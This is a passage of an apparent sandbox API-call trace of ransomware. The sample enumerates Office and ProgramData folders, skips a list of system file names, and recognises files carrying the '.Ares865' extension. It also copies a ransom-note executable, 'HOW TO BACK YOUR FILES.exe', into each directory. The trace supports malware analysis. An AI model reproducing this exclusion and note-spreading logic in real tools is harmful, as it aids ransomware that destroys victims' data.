[0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="temp") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="pagefile.sys") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="boot") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="ids.txt") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="ntuser.dat") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="perflogs") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="MSBuild") returned 1 [0090.259] lstrlenW (lpString="tokens.dat.Ares865") returned 18 [0090.259] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 84 [0090.260] lstrcpyW (in: lpString1=0x2cce49e, lpString2="tokens.dat.Ares865" | out: lpString1="tokens.dat.Ares865") returned="tokens.dat.Ares865" [0090.260] lstrlenW (lpString="tokens.dat.Ares865") returned 18 [0090.260] lstrlenW (lpString="Ares865") returned 7 [0090.260] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0090.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0090.260] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 84 [0090.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0090.260] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.260] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\officesoftwareprotectionplatform\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.260] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.261] GetLastError () returned 0x0 [0090.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.261] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.261] CloseHandle (hObject=0x120) returned 1 [0090.261] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.261] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.261] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64905160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64905160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.261] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.261] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.261] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.261] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.261] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.261] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.261] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.261] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="aoldtz.exe") returned 1 [0090.261] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2=".") returned 1 [0090.261] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="..") returned 1 [0090.261] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="windows") returned -1 [0090.261] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="bootmgr") returned 1 [0090.262] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="temp") returned -1 [0090.262] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="pagefile.sys") returned -1 [0090.262] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="boot") returned 1 [0090.262] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="ids.txt") returned -1 [0090.262] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="ntuser.dat") returned -1 [0090.262] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="perflogs") returned -1 [0090.262] lstrcmpiW (lpString1="cache.dat.Ares865", lpString2="MSBuild") returned -1 [0090.262] lstrlenW (lpString="cache.dat.Ares865") returned 17 [0090.262] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned 86 [0090.262] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="cache.dat.Ares865" | out: lpString1="cache.dat.Ares865") returned="cache.dat.Ares865" [0090.262] lstrlenW (lpString="cache.dat.Ares865") returned 17 [0090.262] lstrlenW (lpString="Ares865") returned 7 [0090.262] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.262] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.262] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE" [0090.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0090.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0090.262] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE") returned 52 [0090.262] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE" [0090.262] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.262] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.263] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.263] GetLastError () returned 0x0 [0090.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.263] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.263] CloseHandle (hObject=0x120) returned 1 [0090.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.263] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.263] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x64b40600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64b40600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.263] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.263] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.263] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.263] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.264] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.264] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.264] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="aoldtz.exe") returned 1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2=".") returned 1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="..") returned 1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="windows") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="bootmgr") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="temp") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="pagefile.sys") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="boot") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="ids.txt") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="ntuser.dat") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="perflogs") returned -1 [0090.264] lstrcmpiW (lpString1="AssetLibrary.ico.Ares865", lpString2="MSBuild") returned -1 [0090.264] lstrlenW (lpString="AssetLibrary.ico.Ares865") returned 24 [0090.264] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\*") returned 54 [0090.264] lstrcpyW (in: lpString1=0x2cce46a, lpString2="AssetLibrary.ico.Ares865" | out: lpString1="AssetLibrary.ico.Ares865") returned="AssetLibrary.ico.Ares865" [0090.264] lstrlenW (lpString="AssetLibrary.ico.Ares865") returned 24 [0090.264] lstrlenW (lpString="Ares865") returned 7 [0090.264] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="aoldtz.exe") returned 1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2=".") returned 1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="..") returned 1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="windows") returned -1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="bootmgr") returned 1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="temp") returned -1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="pagefile.sys") returned -1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="boot") returned 1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="ids.txt") returned -1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="ntuser.dat") returned -1 [0090.264] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="perflogs") returned -1 [0090.265] lstrcmpiW (lpString1="DocumentRepository.ico.Ares865", lpString2="MSBuild") returned -1 [0090.265] lstrlenW (lpString="DocumentRepository.ico.Ares865") returned 30 [0090.265] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\AssetLibrary.ico.Ares865") returned 77 [0090.265] lstrcpyW (in: lpString1=0x2cce46a, lpString2="DocumentRepository.ico.Ares865" | out: lpString1="DocumentRepository.ico.Ares865") returned="DocumentRepository.ico.Ares865" [0090.265] lstrlenW (lpString="DocumentRepository.ico.Ares865") returned 30 [0090.265] lstrlenW (lpString="Ares865") returned 7 [0090.265] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.265] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="aoldtz.exe") returned 1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2=".") returned 1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="..") returned 1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="windows") returned -1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="bootmgr") returned 1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="temp") returned -1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="pagefile.sys") returned -1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="boot") returned 1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="ids.txt") returned 1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="ntuser.dat") returned -1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="perflogs") returned -1 [0090.265] lstrcmpiW (lpString1="MySharePoints.ico.Ares865", lpString2="MSBuild") returned 1 [0090.265] lstrlenW (lpString="MySharePoints.ico.Ares865") returned 25 [0090.265] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\DocumentRepository.ico.Ares865") returned 83 [0090.265] lstrcpyW (in: lpString1=0x2cce46a, lpString2="MySharePoints.ico.Ares865" | out: lpString1="MySharePoints.ico.Ares865") returned="MySharePoints.ico.Ares865" [0090.265] lstrlenW (lpString="MySharePoints.ico.Ares865") returned 25 [0090.265] lstrlenW (lpString="Ares865") returned 7 [0090.265] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.265] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.265] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="aoldtz.exe") returned 1 [0090.265] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2=".") returned 1 [0090.265] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="..") returned 1 [0090.265] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="windows") returned -1 [0090.266] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="bootmgr") returned 1 [0090.266] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="temp") returned -1 [0090.266] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="pagefile.sys") returned -1 [0090.266] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="boot") returned 1 [0090.266] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="ids.txt") returned 1 [0090.266] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="ntuser.dat") returned -1 [0090.266] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="perflogs") returned -1 [0090.266] lstrcmpiW (lpString1="MySite.ico.Ares865", lpString2="MSBuild") returned 1 [0090.266] lstrlenW (lpString="MySite.ico.Ares865") returned 18 [0090.266] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\MySharePoints.ico.Ares865") returned 78 [0090.266] lstrcpyW (in: lpString1=0x2cce46a, lpString2="MySite.ico.Ares865" | out: lpString1="MySite.ico.Ares865") returned="MySite.ico.Ares865" [0090.266] lstrlenW (lpString="MySite.ico.Ares865") returned 18 [0090.266] lstrlenW (lpString="Ares865") returned 7 [0090.266] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="aoldtz.exe") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2=".") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="..") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="windows") returned -1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="bootmgr") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="temp") returned -1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="pagefile.sys") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="boot") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="ids.txt") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="ntuser.dat") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="perflogs") returned 1 [0090.266] lstrcmpiW (lpString1="SharePointPortalSite.ico.Ares865", lpString2="MSBuild") returned 1 [0090.266] lstrlenW (lpString="SharePointPortalSite.ico.Ares865") returned 32 [0090.266] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\MySite.ico.Ares865") returned 71 [0090.266] lstrcpyW (in: lpString1=0x2cce46a, lpString2="SharePointPortalSite.ico.Ares865" | out: lpString1="SharePointPortalSite.ico.Ares865") returned="SharePointPortalSite.ico.Ares865" [0090.266] lstrlenW (lpString="SharePointPortalSite.ico.Ares865") returned 32 [0090.266] lstrlenW (lpString="Ares865") returned 7 [0090.266] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.266] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="aoldtz.exe") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2=".") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="..") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="windows") returned -1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="bootmgr") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="temp") returned -1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="pagefile.sys") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="boot") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="ids.txt") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="ntuser.dat") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="perflogs") returned 1 [0090.267] lstrcmpiW (lpString1="SharePointTeamSite.ico.Ares865", lpString2="MSBuild") returned 1 [0090.267] lstrlenW (lpString="SharePointTeamSite.ico.Ares865") returned 30 [0090.267] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\SharePointPortalSite.ico.Ares865") returned 85 [0090.267] lstrcpyW (in: lpString1=0x2cce46a, lpString2="SharePointTeamSite.ico.Ares865" | out: lpString1="SharePointTeamSite.ico.Ares865") returned="SharePointTeamSite.ico.Ares865" [0090.267] lstrlenW (lpString="SharePointTeamSite.ico.Ares865") returned 30 [0090.267] lstrlenW (lpString="Ares865") returned 7 [0090.267] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="aoldtz.exe") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2=".") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="..") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="windows") returned -1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="bootmgr") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="temp") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="pagefile.sys") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="boot") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="ids.txt") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="ntuser.dat") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="perflogs") returned 1 [0090.267] lstrcmpiW (lpString1="UICaptions", lpString2="MSBuild") returned 1 [0090.267] lstrlenW (lpString="UICaptions") returned 10 [0090.267] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\SharePointTeamSite.ico.Ares865") returned 83 [0090.267] lstrcpyW (in: lpString1=0x2cce46a, lpString2="UICaptions" | out: lpString1="UICaptions") returned="UICaptions" [0090.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0090.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f00d8 [0090.268] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0090.268] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions" [0090.268] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0090.268] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0090.268] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions") returned 63 [0090.268] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions" [0090.268] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.268] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\office\\uicaptions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.268] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.269] GetLastError () returned 0x0 [0090.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.269] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.269] CloseHandle (hObject=0x120) returned 1 [0090.269] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.269] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.269] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.269] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.269] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.269] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.269] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.269] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.269] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.269] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.269] lstrcmpiW (lpString1="1036", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="aoldtz.exe") returned -1 [0090.269] lstrcmpiW (lpString1="1036", lpString2=".") returned 1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="..") returned 1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="windows") returned -1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="bootmgr") returned -1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="temp") returned -1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="pagefile.sys") returned -1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="boot") returned -1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="ids.txt") returned -1 [0090.269] lstrcmpiW (lpString1="1036", lpString2="ntuser.dat") returned -1 [0090.270] lstrcmpiW (lpString1="1036", lpString2="perflogs") returned -1 [0090.270] lstrcmpiW (lpString1="1036", 